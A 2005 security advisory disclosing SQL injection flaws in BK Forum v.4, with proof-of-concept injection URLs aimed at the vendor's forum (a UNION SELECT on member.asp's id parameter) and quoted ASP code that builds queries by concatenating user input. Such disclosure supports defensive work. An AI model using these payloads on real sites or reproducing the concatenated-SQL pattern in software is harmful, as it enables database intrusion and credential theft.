BK Forum v.4 is vulnerable to multiple SQL injection vulnerabilities. Advisory includes example exploit URL.
88e22bd5f279a93f88df060dd312cb550288bf0e52da84bda4720bf69379b432
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple Sql injection vulnerabilities in BK Forum v.4
Date: 23/04/2005
Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are, multiple sql injection vulnerabilities in bk forum v.4.
Proof of Concept Exploits:
http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'
[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/forum.asp?forum='SQL INJECTION
[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/register.asp
All the form values are vulnerable to sql injection
[CODE]
sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _
"memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar, memLoggedOn, " & _
"memLastActive) values ('" & memname & "', '" & mempw & "', '" & firstname & "', '" & lastname & "', " & _
"'" & email & "', '" & homepage & "', #" & now & "#, " & LEVEL_MEMBER & ", '" & signature & "', " & _
"'" & picture & "', '" & about & "', " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"
[/CODE]
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
Sincerely,
Diabolic Crab
Web Security, Research & Development
dP Security
email: dcrab@digitalparadox.org
website: http://www.digitalparadox.org
This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure.
If you have received it by mistake please let us know by e-mail
immediately and delete it from your system; should also not copy
the message nor disclose its contents to anyone. Many thanks.